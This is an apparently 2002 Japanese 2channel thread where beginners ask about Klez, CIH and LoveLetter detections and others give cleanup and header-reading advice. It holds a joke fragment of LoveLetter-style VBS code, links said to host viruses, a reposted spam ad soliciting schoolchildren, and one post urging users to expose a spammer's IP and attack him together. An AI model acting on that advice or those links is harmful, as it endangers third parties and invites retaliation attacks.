だって、オンラインがしょぼかったら、
もういいや、ほかの会社のにしようと思っちゃうよ。

汚染を除去しました。

>>66
お前、何が嬉しくて生きてるんだ？
困ってるやつがいるんだから、邪魔する事はないだろう。
あっちこっち見渡して、陰湿な奴だな。

どうでもいいぽ

数ヶ月前から週一ぐらい定期的に(脳トン曰く)W32.Klez.H@mm付きのメールが来るんですが、毎回脳�dの検疫行きになってます。
ヘッダを見るとReceived:の最初がいつも"p****-ip01sizuokaden.shizuoka.ocn.ne.jp"です。
ウザイので弾きたいのですが、メーラも鯖もドメインで弾くのに対応してないようで、直接向こうに言って止めさせたいのですが、
この場合ＯＣＮに連絡すればいいんでしょうか？

>>109
http://pc.2ch.net/test/read.cgi/sec/1024255721/2-3

>>110
済みません、よく読んでませんでした。逝ってきます。ありがとう。

ウイルスが載ってるページです。
http://members.tripod.co.jp/ittekimasu/403.html

あの、素人でスイマセンデス・・・
２ちゃんの中のリンクはってあるところ（青い字のトコ）クリックすると全部
ttp://pinktower.comってトコにつながってしまいます。
これってウイルスに感染しちゃったんでしょうか？
だれか助けてください！！

>>113
> これってウイルスに感染しちゃったんでしょうか？
「ウイルスに感染しちゃったんでしょうか？」と聞く前にウイルススキャンしろ！

２ちゃんをうろついてたら
VBS.LoveLetter.varと言うウィルスに感染してしまいました。
ラヴレター類はノートンで修復できる筈のウィルスと書いてあったのですが
駄目でした・・・。
LoveLetterの次の文字を調べたらvarと言うのは存在して
いないみたいなので新種なんですか？
感染したファイルを削除しようと思ってもできません。
どなたかアドバイスを下さい。

隔離

差出人（From:）がkeisatu <[email protected]>になってるのがメールで来ました。

添付ファイルもあるのですがアウトルックで「次の添付ファイルは安全でないため。メールからのアクセスが削除されました align.exe,0287_10[1].jpg」と出て内容を確認できません。
このメールは警察って本物なんでしょうか・・
メールヘッダでわかるとしたらどれを載せればよいのでしょう？

ちなみにプロバ（ocn）のアドレスに添付ファイルつきの不思議なメールが多数来てますが怪しさ１００％？？？
http://elsefiz.hypermart.net/cgi-bin1/image/079.jpg

>>117
なぜに、前の書き込みとか参照して、オンラインウィルス
スキャンとか、やってから書き込もうとしないわけ？

google で検索したホームページの文言を読むべし。
http://www.jcu.edu.au/office/itr/archives/matlab/msg00024.shtml

……………ところで、今日って klez の発病日じゃないっけ？

>>117
警察庁が個人にメールだすか?
なんかホームページで問い合わせたのか？
なけりゃどうしてわざわざメールだすのさ？

>>117
添付ファイルを見るには、オプション→セキュリティ→
ウイルスの可能性のある添付ファイルを…のチェックを外す。

メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。

>>118
奇数月6日

こんにちわ。
　知り合いがプロバイダを７月いっぱいで解約したのですが、
その後８月５日に３つもウィルスらしきメールが来ました。
それも、解約したはずの前のプロバイダーで使っていたアドレス
からです。
　解約したアドレスからメールが来るなんてあるのでしょう
か？
　ちなみにそれぞれ１３０Kバイトほどのメールです。hotmail
に届いているので、ウィルスかどうかははっきりわかりません
が、明らかにウィルスですよね＾＾；
　outlookに転送する以外にチェックする方法ってあるんでしょうか？

>>117

>>122
まず削除依頼出して来い

絶対出ると思ったｗ
>>124

>>125
思ったんなら出して来い
甘えるな

しつけ〜な。
質問に答える知識がないなら無視してくださいよ。

>>127
その一言が命取り

何がですか？
>>128

>>129
うぜーよ、カス。

>>130
桜は放置でお願いします

結局対策はみんなわかんないのかな〜？

次の質問者どうぞ〜

>>122
http://pc.2ch.net/test/read.cgi/sec/1024255721/を熟読しなさい。過去ログも

まともな人もいるんですね〜＾＾
>>134

>>135
お前以外は全員まとも。
安心しろ。

やってもうた！
ローマ字名のメールが来て、なんじゃらホイと右クリックしたら「ぴゅっ！」
て送ったみたい。
　案の定、他社から電話来て「たぶんお宅から送られたと思うんだけどメール感染しました？」
だって．．．ああー２度目なんだよね。どうしてくれるーっ！！

>>118
すいませぬ・・。

>>120
＞メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。
From: keisatu <[email protected]>
Return-Path: [email protected]

Delivered-To: CLUSTERHOST www.pub.to *********@pub.to
Received: (qmail 19550 invoked from network); 5 Aug 2002 21:11:09 +0900
Received: from ns1.dental-city.com ([210.231.99.197])
(envelope-sender <[email protected]>)
by www.pub.to (qmail-ldap-1.03) with SMTP
for <*********@pub.to>; 5 Aug 2002 21:11:09 +0900
Received: from Zarihvx (p0323-ip02;;;;;;;;;.ocn.ne.jp [61.119.;;;.;;])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with SMTP id VAA28500
for <********@pub.to>; Mon, 5 Aug 2002 21:09:11 +0900

ヘッダの見方が全くわかりませんが***@pub.toの転送アドレスに警察庁の名前できてたので素人目にはスゴクびびりました。

http://elsefiz.hypermart.net/cgi-bin1/image/079.jpg
↑
こっちのは試しに添付ファイル開いてみたけどなにもでませんでした（でもウィルスバスターの常駐してた右下のアイコン？が消えちゃって。。）

ホットメールってウィルス対策機能あるって聞いてたけど働いて無いのか・・
過去ログ読んでクレズウィルスの事少しは勉強してきまふ。。

>>135には状況がわかってるんだろうか？
>>135のメル友の誰かがクレズにやられて、そいつのアドレス帳に載っていた>>135の古いメアドを騙って、
やはりそいつのアドレス帳に載っていた>>135の新しいメアドにクレズ入りメールを発信しただけの話だ。

>>138
だから、Return-Path: のメールアドレスが、感染者のアドレスなの。
symantec とか trendmaicro の解説をちゃんと読め。

klez は、From: を偽装するの。

>>138
Klez？は第三者中継が出来るサーバーを探すのか？

http://www.nanet.co.jp/rlytest/relaytest.html
mail.dental-city.com (pri=10)
<220 ns1.dental-city.com ESMTP Sendmail 8.9.3+3.2W/8.9.3
>HELO rlytest.nanet.co.jp
<250 ns1.dental-city.com Hello ns.nanet.co.jp [210.164.52.3],
pleased to meet you
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/requestedfrom[205.158.62.26]@mail.dental-city.com >
<250 < TESThttp://www.nanet.co.jp/rlytest/requestedfrom[202.77.181.71]@mail.dental-city.com >... Sender ok
>RCPT TO:<rlytest＠nanet.co.jp>
<250 <[email protected]>... Recipient ok
>QUIT
<221 ns1.dental-city.com closing connection
問題あり：不正な中継を受け付けます。
(210.231.99.197)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

210.231.99.197
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.231.99.128/25
有限会社 エーアンドピーデータシステムズ (A&P DATA SYSTEMS Inc.)
MAIL-OFFICE [210.231.99.128 <-> 210.231.99.255] 210.231.99.128/25

http://www.ordb.org/lookup/?host=mail.dental-city.com
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mail.dental-city.com (210.231.99.197)
データベースの検索結果: ns1.dental-city.com (210.231.99.197)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2001-08-23 16:06 GMT
初回送信ホスト: 202.36.148.21
最終検査日時: 2001-10-25 22:04 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin＠groundzero.ordb.org
Received: from ns1.dental-city.com (unknown [210.231.99.197])
by groundzero.ordb.org (Postfix) with ESMTP id 545B25B1D0
for ; Thu, 25 Oct 2001 22:45:42 +0200 (CEST)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with ESMTP id FAA16331
for ; Fri, 26 Oct 2001 05:45:39 +0900
Date: Fri, 26 Oct 2001 05:45:39 +0900
Message-Id:< [email protected] >
X-ORDB-Envelope-MAIL-FROM:
X-ORDB-Envelope-RCPT-TO:
From: [email protected]
To: marvin＠ordb.org
Subject: ORDB.org check (0.1210261005908250.0448847324) (20)

最近急にKlezが届くようになった
しかも宛先不明とヘッダーにある
不覚にもある日ぼ〜〜〜っとしていて開いてしまったよ
今日も4通、また流行りだした？

Klez.eに感染しますた。
今、すべてリカバリーし直したんだけど
これで大丈夫かな？
それとも９月５日まで日にちがあったから
業者の人に駆除してもらえば良かったかな？
リカバリーしても駄目ってことはないですよね？
馬鹿ですみませんが教えてください。
ネット上の無料チェックのソフトでやったら
Klezともう一個別なのにも感染してたけど
英語だらけで駆除方法がわからないんだもの。。。

>>141
>Klez？は第三者中継が出来るサーバーを探すのか？

ｽｯﾊﾟﾏが感染しただけのことﾁﾞｬﾈｰﾉ??

>>144
EXEファイルとかデータファイル破壊されていなかったなら、駆除ツールで十分だったのに。
リカバリーしてハードディスクをフォーマット後にOSを新規インスコしたなら大丈夫ですが。

>英語だらけで駆除方法がわからないんだもの
アンチウイルスソフトを購入したらどうでしょか。
とりあえずVirus Baster 2002が一番初心者向けでトラブルが少ないです。

>>146
ありがとうございます。
知人からソフト貸してもらって
インストールします。

リカバリー後チェックしたら
もう大丈夫でした。
めちゃ手間がかかったので
これからは、メールには十分注意をしようと思っています。

>>144
>知人からソフト貸してもらって
>インストールします。

アンチウイルスソフトは、割れ（というか不正コピー）するとすぐバレたり、どちらかに不具合生じませんでしょか、社会的に。
せいぜい数千円なんで、買えばどうでしょ。

>>147
>知人からソフト貸してもらって
>インストールします。

(;ﾟДﾟ)ﾎﾟｶｰﾝ.....

love letter virusに感染して、なにも知らずに再起動してしまいました。
もうだめなんでしょうか。別のパソコンから書きこんでいます。
泣きそうです。

klezに感染したみたいです。
ウィルスバスター買って検索したらあっちこっち繁殖してました。klezて出てました。
元を断たなきゃだめみたいですね。結局、フォーマットして他のドライブに繁殖したファイルを
削除しました。
　実害てどうなんでしょう？良くわかりません。でも迷惑な事はたしかです！

>>151
実害？フォーマットして必要なファイルなくさなかったのか？
再ｲﾝｽｺでかかった手間はどうだ？そういうことだ。

>>150
なぜ、も少し上のレスを読まないんでしょか。

>>153
気が動転してるから。

>154
貼っときますか。。。。
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>153
＞VBS.LoveLetter.var
これによるウィルススキャンソフトの誤作動ってことでしょうか。
そうではなさそうなんです。
ＷＩＮＤＯＷＳ\ＳＩＳＴＥＭ３２\ＣＯＮＦＩＧ\ＳＩＳＴＥＭ
が壊れてるとでてるので。

2chにアクセスした途端、IEのテンポラリがVBS.LoveLetter.varに感染している旨の警告（NAV）が出たんだけど、俺だけ？

>>157
皆そう
よく周りを見るべし

http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

みんなは警告されただけでなんでおれは>>156みたいになってんのＹＯ（泣

ﾏｻｶﾄｵﾓｳｹﾄﾞ､､､ﾗﾌﾞﾚﾀ､htmlにねじ込んでﾊﾞﾗﾏｲﾃﾙﾔｼ････

VBS_HAPTIMEﾐﾀｸ････

>>160
SYSTEMをSISTEMと書くからじゃないのか？

>>162
書き間違いたんだＹＯ！！（泣
もう再インスコするしかないぽ

あきらめるなYO！！

>>163
害がなけりゃ放置していいんじゃないかな？

c.Copy(dirsystem&"\このスレ馬鹿ばっか（ｗ.TXT.vbs")

ここのページみるとノートン博士が毎回・・・です。
ｽｷｬﾝの種類: ﾘｱﾙﾀｲﾑ保護 ｽｷｬﾝ
ｲﾍﾞﾝﾄ: ｳｨﾙｽが見つかりました｡
ｳｨﾙｽ名: VBS.LoveLetter.Var
ﾌｧｲﾙ: C:\WINDOWS\Temporary Internet Files\Content.IE5\0X47KN0B\l50[2]
場所: 検疫
ｺﾝﾋﾟｭｰﾀ: ※※※
ﾕｰｻﾞｰ: ○○○
適用した処理: ｸﾘｰﾆﾝｸﾞ 失敗 : 検疫 正常に完了 : ｱｸｾｽが拒否されました
検出日: Thu Aug 08 13:27:31 2002

>>167
ガイシュツすぎて解説する気にもなれないのは俺だけじゃないはず

>>167
とりあえず前スレとか前々スレとか、このスレだったら38あたりでも見たら？

2chでスレッドを表示しようとしたらノートンに引っかかりました。
検疫→削除と選択したのですが、書込み禁止のディスクのため削除できませんでした。
推奨とある隔離放置?（問題は広がりませんと表示されました。）したのですが
問題は無いのでしょうか?
アドバイスをお願いします。

すぐ上で出ていましたね。
あせっていたので見落としてしまいました。
申し訳ないです。

InterScan VirusWallのパターンファイルは 333（最新のはず）
McAfee VirusScan のパターンファイルは 4.0.4127（最新）
でスルーしてしまいます。

From：詐称。
題名：英文「Worm Kles.E immunity」他。
本文：ナシ。
添付：色々。

来たのは今日の昼、複数来てますんで新種かなと思われますが、
皆さんどうですか？

>>172
Kles.Eは初めて聞いたな。
Klez.Eなら山ほど来てるが。

>>173
>Kles.Eは初めて聞いたな。
>Klez.Eなら山ほど来てるが

ケーブル抜いて、逝ってきます。

情報が錯綜してる様で、本文もある奴があったらしいです。
対応してる人間が複数いるので。

>>174
とりあえずここへ
http://pc.2ch.net/test/read.cgi/sec/1024255721/-100

>>175

ありがとうございます。
さっそく確認してみます。

助けてください。

↓このページって、ウィルスですかブラクラですか？
http://www.niji.or.jp/home/hs2903/imgboard/img-box/img20020807220521.jpg

>>177
はいはいこっちも
http://pc.2ch.net/test/read.cgi/sec/1028559356/202

マルチと

マルチするような奴は人柱になりなさいね

件名「Let's be friends」ってメールが
添付ファイル付きで届いたんですが。
これもウィルスなんでしょうか
内容は見てません

>>180
Klez

っていうか大人しくノートン先生でも買え
これからも毎回ここで聞くつもりか？

>>181
CIHだった

>>182
CIHですか。
よく分からないですがウィルスなんですね
こんなのきたの初めてだったので…
おとなしくノートン先生を買いに逝ってきます。

どうやら自分はKlezウィルスに感染してしまったようです。
一応ノートンを使いウィルススキャンをして、
感染ファイルを検疫したのですが、これだけで解決するんでしょうか？心配です。

どうやら不完全なウイルスの様でした。
メールを受信して添付を実行したPCから裏でメールの送信は有りませんでした。

From：詐称。 アドレス帳、inbox辺りから収集
題名：英文、色々。
本文：ナシ又は10行ほどの英文。
添付：色々。感染者のディスクから名前のみ使用。本体はナシ（実行後に確認、0バイト）

メールで感染できないなら、どっかのWebで騙されて落として実行したのかな？

お騒がせしました。

>>185
知らないうちにウィルスばらまいてなかったってどうしてわかるの？
それと、たぶんキミの受け取ったメールはプロバイダで感染した添付部分を削除されてる。

>>186

SMTPのログで確認しましたが。

僕が受け取った訳ではなく他の作業者のPCですが。

>>172 で書いているようにInterScanをスルーして来たんですけど。

な　に　か　？

>>186

>>187　に追加。

ウイルスと思われるメールの送信先プロバイダの対応です。

FAQより
Ｑ． 送信するメールについてウィルスチェックはされないのですか？

Ａ． 受信するメールのみがウィルスチェックの対象となります。

さっぱり来てないし
どうでもいいし
キレルなら書き込むな

やばいｯス。ＰＣ起動しないｯス。起動画面からジェﾝジェﾝ動かない！

―――――――――
　マンキンかな？
　　　　　　　　　　　　　　 ／￣￣￣￣￣￣
￣￣∨￣￣￣￣￣￣ | 　（シラネーヨ）
　日　M　[]　0　�U　�U レ―――――――
＝＝＝＝＝＝〃∧＿∧＝
　�U　∩ 　　　％（´∀｀　）
＿_ ∧ ∧＿_∧＿∧＿_.）_　 ／￣￣￣￣￣
　　( 　　,,)日（　　　　）∇　 ＜　困ったね。
― / 　 |―-（　　　　）――　 ＼＿＿＿＿＿
　（＿__ﾉ　　　━┳━)
　━┳━ 　　└┃―･ﾞ
￣　┻￣￣￣　┻￣￣￣￣

何か分からないけど、気がつくと色んなディレクトリに「112.bmp」という
中身はデスクトップのハードコピーが削除しても勝手に(?)作られてるんだが…。
何か変なウイルスとかの仕業かなぁ？？？
※注：ノートンとThe Cleanerで検索したが発見されない。。。

>>191
そんなウイルスはないよ

オンラインウィルスバスターでREG.STARTPAGE〜っていうウィルスを発見して
削除したら、パソコン起動時にエラーの表示が出て直らないので、ファイルを
復元して、結局ウィルスはパソコンの中に入ったままです。
ノートンでスキャンしても引っかからないので困ってます。

>>193
一生困っててくれ

>>193
これだろ。削除しろとは言われなかったんじゃないか？
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=REG_STARTPAGE.A

>>191
一定時間ごとにスナップショット撮るようなソフトが
常駐してるんじゃないの？

a funny game
というメールがきた方いらしゃいます？
三日くらい前にも別のウイルスメールと思われるものがきたんですが、
差出人は同じようです。

>>197
立派なKlezと思われ。
差出人は偽装してあるから、キレて抗議メールなんかを送ったりしないように。

あとはKlezスレでどうぞ。

突然マシンがFBI（www.fbi.gov）やwww.army.milや、www.yahoo.comのtelnet、smtp、pop3のポートへアクセスしだした！！！
特別実行ファイルを動かした記憶はないんですが。。。
Outlookも使ってないし、メールを開いたとかじゃあないんです。

どなたか原因となってそうなウイルスとかご存知ないですか？？？
初心者丸出しでごめんなさい。どなたかご存知中田、お願いします。

>>199
ネタはよそで

>>199
ウィルススキャンしてみりゃええがな。

>>199 へんなアプリケーションダウンロードしたときにインストールされた
んじゃないかな。
オンラインスキャンhttp://www.trendmicro.co.jp/hcall/index.asp
して発見されなかったら、再インストール。

メモリ上でウィルスは見つかりませんでした。

スキャンしたファイルの中に 1 つ以上のウィルスが検出されました。

メモ: スキャンを終了する前に中止しました。このコンピュータ上にはさらに感染ファイルがあるかもしれません。

この問題を解決するには:

修復に役立つ総合的なウィルス対策プログラムの購入をご検討ください。
または、次のファイルを削除します:


スキャンを実行していません。 ウィルススキャンを開始するには、 ここをクリック.

c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\U5QF8P2V\-100[2] は 次のウィルスに感染しています： VBS.Internal
c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています： VBS.LoveLetter.Var
どうしたらいいの？

ありがとう。
でもみつからなかた。。。
おとなしく再インストールします。

>>203
面倒だ。「ツール」→「インターネットオプション」 から一時ファイルの削除をしろ。
vbsはこのスレでも書かれまくってるのに・・・

ニュー速馬鹿は過去ログ読まないって事ですな

>>204
ちゃんと必要な設定のバックアップとっとけよ！
てか、それごときで再ｲﾝｽｺしてたら・・・
ファイヤーウォール入れてポート閉じておけ！
できんか・・・
使ってるOSくらい書けよな。msconfigでスタートアップを見るとかさ。
Ad-aware使うとか。いろいろ試す楽しみがあるのによ！

昨日から、エクスプローラーの最小化、最大化の
ボタンの文字が気持ち悪くなりました。
これはウィルスなのでしょうか？

>>208
http://.winfaq.jp/
ここの最初に書いてあります。
ウイルスではないから安心して下さい。

>>208
http://.winfaq.jp/
ここの最初に書いてあります。
ウイルスではないから安心して下さい。

>>218
http://winfaq.jp/でした。

＞２０５
削除しました。

>>212
はい、それでもう検出されません。ついでに過去レス読んでおいてね。

＞２１３
ういーす。

＞２１３
スキャンしたら
:\RECYCLED\DC10 は 次のウィルスに感染しています： VBS.Internal
c:\RECYCLED\DC12 は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\G71RM2Z5\index[2].html は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\89UJ856N\subback[9].html は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\W1AZ49AF\news[4] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\RYZXYNIY\subback[7].html は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\KPWJS96T\sec[2] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[12] は 次のウィルスに感染しています： VBS.LoveLetter.Var
c:\WINDOWS\Temporary Internet Files\Content.IE5\0A2IPWXG\news[13] は 次のウィルスに感染しています： VBS.LoveLetter.Var
こうなってます。
疲れました・・・

http://ime.nu/www.kogalu.com/sou/girls/index2.htm
これウイルスですか？
うかつにも踏んでしまいました。
ちなみにウイルスバスターには入ってます。

>>215
過去レス読んだ？このVBS.Love Letter...は無害だから。
それに、削除したファイルはごみ箱に行くことは知ってるよね？
C:\Recycledってのはごみ箱のことです。中身空にすりゃいい。
あと、削除作業してからまた2ちゃん見たでしょう。それでキャッシュファイルが
再度できちゃってるね。とにかく過去レスに該当ウィルス（？）のスレが載ってるから
見てみなよ！

http://kado7.ug.to/net/


朝までから騒ぎ！！
　　　小中高生
　コギャル〜熟女まで
　　　メル友
　　i/j/PC/対応

女性の子もたくさん来てね
　　小中高生大歓迎です　　　　　　　　　　　　　　　　　
全国デ−トスポット情報も有ります。
全国エステ＆ネイル情報あります。

　　激安携帯情報あります。

女性の子…文がおかしいな(w
コピペに突っ込みなのでsage

>>219
額面上だけ丁寧にして引き寄せようという罠。
あまりに見え透いている。

＞２１７
失礼しました。
「オフライン・・・」にチェック入れずに削除
してました。
今、スキャンしたら感染０でした。
ふうう・・・

教えていただきたいのですが、
ウイルスにやられたみたいなんです。

症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、
「スクロール」するやつがありますよね。
マウスで左クリックして、押したままにして、上下に動かすやつです。

そのスクロールするやつが、なにもマウス操作もしていないのに、
勝手気ままに上下動を繰り返すのです。
そんなもんだから、IEブラウザも、じっくり見ていられません。

どう対処すればよろしいのでしょうか？

>>222
駆除しろよ

>>223
削除方法、教えていただけませんでしょうか？

あと、なんのウイスルかもわからないもんで・・

最大化、最小化、閉じるなどのアイコンが
数字などになったんですがこれってウィルスですか？

>>224
ネタはよそで
独り言は部屋で

>>225
セーフモードで起動せえ
直る

608 名前：ちびた 投稿日：02/08/12 23:16
教えていただきたいのですが、
ウイルスにやられたみたいなんです。

症状は、IEのブラウザや、普通のフォルダを見ているときの、右端に、
「スクロール」するやつがありますよね。
マウスで左クリックして、押したままにして、上下に動かすやつです。

そのスクロールするやつが、なにもマウス操作もしていないのに、
勝手気ままに上下動を繰り返すのです。
そんなもんだから、IEブラウザも、じっくり見ていられません。

どう対処すればよろしいのでしょうか？


609 名前：ちびた 投稿日：02/08/12 23:20
すみません、上の書き込み、書くスレ間違えました。
無視してやってください。

よろしければ、こちらへ・・・
http://pc.2ch.net/test/read.cgi/sec/1027397623/


ネタ決定

そんなの貼りつけてどうすんの?

>>227
ありがとうございますた。
危うく初期化するところでした、マジで。

>>230
そんな君に
ttp://winfaq.jp/
全部読んだら勉強になるぞ。

>>224
笛かよ。ｗ
そんなウィルス聞いたこと無いよ。接続はダイアルアップ？
オンラインウィルスチェックってのもあるけど試す？
このスレの>>1-2を見る。

>>224
その現象が起きたきっかけは？
いちおうOSとIEのバージョンと入れているウイルス対策ソフトの名前も聞いておこうか。

予想
Windows 95
IE 4 SP2
ウイルスバスター97

>>234
ちょっとワラタ

ノートンのログを調べてたら判明した事項がありました。
何らかの要因で
http://strange.kurumi.ne.jp/bbs.cgi?n2
を踏んだらしく、そこを踏むと（ノートンのWebアクセス履歴からは）
http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
(%の数は適当です)
にアクセス、
http://localhost/?n2
にアクセスしたあと、http://www.army.mil/へとアクセスしていたみたいです。
そのあとの現象は199で書いたまま。
もしも何か知ってる方がおられましたら教えていただければ幸いです、

>>197
それ来たよ。あと Windows XP Patch なんていうのもあった。

>>227
セーフモードではなおりませんでした。

>>232
ＡＤＳＬです。
オンラインウィルスチェックなんてあったんですね。
ありがとうございます。現在、それをやっているところです。
でも、まだおわらないとこみると、結構時間かかるんですね。
情報、感謝です。

>>233
きっかけは、わからないんです。
ウイルスメールは、２週間に１回ほどきますけど、
開かずに、ちゃんと削除してるので問題ないと思いますし。
OSはwindows98、IEは5.50.4807.2300です。

みなさま、ありがとうございます。
なおらなかったら、またお聞きしていいですか？

オンラインウィルスチェックの結果は、ウイルス無しです。
ということは、いったい、どういうことなのやら・・

勝手にスクロールするこの症状、超むかつきます。
ここに書き込むのさえ、一苦労。
どうすれば、なおるのでしょう？（泣）

>>239
IEを再インスコすれば？

>>240
なるほど。
やりかたがわからないけど、
トライしてみます。

マイクロソフトのホームページいって、
ダウンロードする方法でＯＫなのかな。どれどれ・・

>>241
>ダウンロードする方法でＯＫなのかな。
ダウンロード？？

まぁ、いいや。
徐々に謎が解けるから、がんばれよ。

IE6にしたけど、
解決せず。

どーーなってんのーー

>>242
だめでした。

とりあえずブラウザをOperaあたりに変えてみる

ttp://www.jp.opera.com/download/

再インスコ

なんで寄ってたかって真正面でとらえるの？
オレはマウスの故障に一票だ！
つーかそれって定番ネタだと思う

>>246
んじゃ俺はキーボードが原因に500ｳｫﾝ

『KELDCIKE.EXE.htm(642□□□)』という添付ファイル付きのメールが
送信者・件名がブランクで届きました。
これってウイルスでしょうか…？
symantecや検索サイトで検索してもヒットしませんでした。

Macromedia Flash Playerのセキュリティー上の欠陥ってなに？

>>248
ウイルスだろうな

今日、閉じるや最大、最小のボタンが数字になってたので、加入してるサポートセンターに
電話で尋ねて、解決法を教えてもらい試したが直らなかった。そしたらそこの男は
修理に出すしかないと言った。どうしても納得いかなかったので解決法はないかと2chへ
来てこのスレ見たら、既出の質問で、http://.winfaq.jp/へ行ったら解決できました。
糞野郎のせいで危うく修理にだすとこだった。それと携帯から電話したので140円もかかった。
改めて2chの凄さを知った。最初からここに来ていれば･･･

>>251 ブラウザのセキュリティレベルを見直さないとまた食らうぞ。
何のサポートか知らんが、自分で食らった不正プログラムの始末まで
面倒見るサポートはないと思うぞ。なんでも人のせいにするなよ。

>>251
はじめから自分で調べようとはしないのね

>>252
フォントキャッシュが壊れていただけで
不正プログラムは関係ないと思われ

つーかセキュリティとかんけーない

>>251
サポートセンターに
「その程度のことで電話してくるような輩は埒があかないので修理」
って思われたんだよ

>>254-255 なんで時間が逆転してんの？

ネット関係→セキュリティー→　スレッド一覧にいったら
VBS.LoveLetter.Var ｳｨﾙｽに感染しました　私は除去しましたが
気をつけてください。また　誰か詳しい方　調べてください。

>>258 いまごろ何を・・・
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>259さん　ありがとうございます。　

共有を使って自己複製するタイプのワームで、LAN内で感染しているPCを
一発で特定するいいツールって無いですかね？

例えばLANを経由して共有フォルダのファイルを操作したログを自動的に
取る様なソフトとか・・・

>>222（ちびた）
やっぱり他の人が言うようにマウスかなにかの不具合かも知れないよ？
まあよくわからんけど、俺だったらコントロールパネルのマウスのプロパティで
設定を変えてみて様子を見る。自分のPCではタッチパッドなので、エッジモーション機能が
（パッドのはしっこをいじるとスクロールする）なにか関係したりしないかなあ、とか。
どうしても直らないならマウスのドライバをインストールし直すかな。
入力関係が正常なのにその現象が常時起きるなら背後で動くアプリが有るはず。
msconfigからスタートアップタブを見る、またはレジストリで該当箇所を確認。
でも人のPCだからホントにわからないねえ。マウスの設定で、スクロールできる方法を
全部OFFにしてみたら？惰性を使用するってのもあったね。

>>222
使ってるマシンは、ノート？
タッチパッドだとすると……………

>>254-255
ほんまや!!!!!!!!!!!!!!!!!!!!!!!!!!!!！

macro virusをノートンが検出しましたがどうしたらよいのでしょうか？
２ちゃんねるをリロードすると検出されましたが。

汚染を除去しました。

>>265-266 >>259

ニュー即+で張り幕ってル奴がいるのですがどうしたらよいでしょうか？

>>268
ソーシャルかけておいこんでIPアドレスさらしたらみんなで
おもいおもいにこうげきする。
チームワークがぢゅうようだよ。
ハニーポットたてるのもいいかもね。

HDDからＣＩＨを検出。アブネーアブネー。

>>270
おやぁ？今時って感じなんだけど。誤検出じゃなくて本当に？

レスありがとうございます。

もうだめだ（死
くそ、まじむかつく。
まだ直らず。
もうパソできん。

>>263
いえ、デスクトップです

>>262
いろいろありがとうございます。
コントロールパネルのマウスのプロパティをいじろうとしたんですけど、
このときも、症状がでてしまい、勝手に設定が変えられてしまうんです。
もうどうしようもない。
つまり、いかなる状況においても、マウスの中央のボタンみたいなのが
勝手に転がってしまっているっていう状態なんです。

やっとのことで設定を変えても（中央ボタンを無効にした）、
症状があらわれるのです。

msconfigとか、レジストリとかは、初心者なので、さぱーりわかりません。
惰性とは何でしょうか？

マウス引っこ抜いてみれば
tabキーと矢印キーでも操作できるっしょ

>>275
だからマウス換えてみろって500円のとかでいいからさ
じゃなきゃとりあえず>>276の言うようにマウスレスにしてみる！

ＰＣ起動して、動作が変だと思いＨＤＤ見たらローカルディスク：Ｃ
の容量が少しずつ減っていき(2〜4Ｍずつくらい)、空き容量が1Ｇ→200Ｍになりました。
ディスククリーンアップをすると元の容量になるのですが、また
減っていきます。これはウイルスでしょうか？
即レスお願いします(o_ _)ｏ

>>278
OSくらいは書くべきでは？
怪しい物が動いているか調べたいならタスクマネージャで
挙がるものをリストしてみれば良い

こんなとこで即レスなんとかってやめとけよ
失礼なだけだ

>>279
ＯＳはWindowsMeです、忘れてました。
タスクマネージャはどこにあるのでしょうか？

↑特に怪しいものは動作していないようです。

Meは裏でなに動いてるか解らんから
プロセス監視ツールかなんかでもっかいチェックしれ

ttp://homepage1.nifty.com/wakuhome/java/soft/tools.htm

何かが動作していない限り容量が変わることはないと思うのは俺だけか？

＞名無しピンチ
IEのキャシュは何MBに設定している？

>>282,>>283 さん
ありがとう〜。ソフト使ってみたけどよく分かりませんでした（ぉ
>>284 さん
IEのキャッシュ・・・ですか？そこらへんはいじったことないので
よくわかりません＞＜
IEのキャッシュはどうやればわかりますか？

>>285
http://homepage2.nifty.com/winfaq/wme/trouble.html#26読め

>>286 さん
↑のサイト逝ってきました。
